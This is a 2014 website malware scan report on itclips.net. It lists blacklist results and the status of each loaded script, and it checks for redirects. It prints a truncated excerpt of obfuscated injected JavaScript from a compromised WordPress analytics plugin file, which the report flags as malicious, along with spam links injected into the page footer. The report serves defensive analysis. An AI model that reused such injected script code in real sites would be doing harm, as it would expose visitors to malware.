Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=itclips.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://itclips.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://itclips.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 07:49:24 GMT Location: http://www.itclips.net/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.itclips.net/xmlrpc.php | clean |
http://www.itclips.net/ | 200 OK Content-Length: 76337 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.2sib.com ...[3837 bytes skipped]... r/> <script src="http://stats.wp.com/e-201438.js" type="text/javascript"></script> <script type="text/javascript"> st_go({v:'ext',j:'1:3.1.1',blog:'40218850',post:'0',tz:'0'}); var load_cmc = function(){linktracker_init(40218850,0,2);}; if ( typeof addLoadEvent != 'undefined' ) addLoadEvent(load_cmc); else load_cmc(); </script><!--wp_footer--><center> <a href="http://www.2sib.com/category/iphone/" target="_blank">اپÙÛÚ©Ûش٠آÛÙÙÙ</a> | <a href="http://www.2sib.com/category/ipad/" target="_blank">اپÙÛÚ©Ûش٠آÛپد</a> | <a href="http://www.2sib.com/" target="_blank">اپÙÛÚ©ÛØ´Ù ÙارسÛ</a> | <a href="http://www.2sib.com/" target="_blank">اپÙÛÚ©Ûش٠٠جاÙÛ</a> | <a href="http://www.2sib.com/" target="_blank">اپÙÛÚ©Ûش٠اÛراÙÛ</a> </center> </body> </html> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js | 200 OK Content-Length: 85925 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-content/themes/thefy/js/audio-player.js | 200 OK Content-Length: 11502 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-content/plugins/RSSPoster_PRO/js/functions.js?ver=4.0 | 200 OK Content-Length: 2601 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-content/plugins/jetpack/_inc/postmessage.js?ver=3.1.1 | 200 OK Content-Length: 19615 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-content/plugins/jetpack/_inc/jquery.inview.js?ver=3.1.1 | 200 OK Content-Length: 5590 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=3.1.1 | 200 OK Content-Length: 8104 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.7.3 | 200 OK Content-Length: 3440 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo Antivirus reports:
| ||
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-content/plugins/amazon-affiliate-link-localizer/js/amazon_linker.min.js?v=1.9 | 200 OK Content-Length: 8784 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21412 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-content/themes/thefy/js/jquery.prettyPhoto.js | 200 OK Content-Length: 23508 Content-Type: text/javascript | clean |
http://www.itclips.net/wp-content/themes/thefy/js/jquery.isotope.min.js | 200 OK Content-Length: 15751 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: itclips.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 19 Sep 2014 07:49:24 GMT
Location: http://www.itclips.net/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.itclips.net/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: itclips.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 19 Sep 2014 07:49:24 GMT
Location: http://www.itclips.net/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.itclips.net/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: itclips.net
Referer: http://www.google.com/search?q=itclips.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: itclips.net
Referer: http://www.google.com/search?q=itclips.net
Result:
The result is similar to the first query. There are no suspicious redirects found.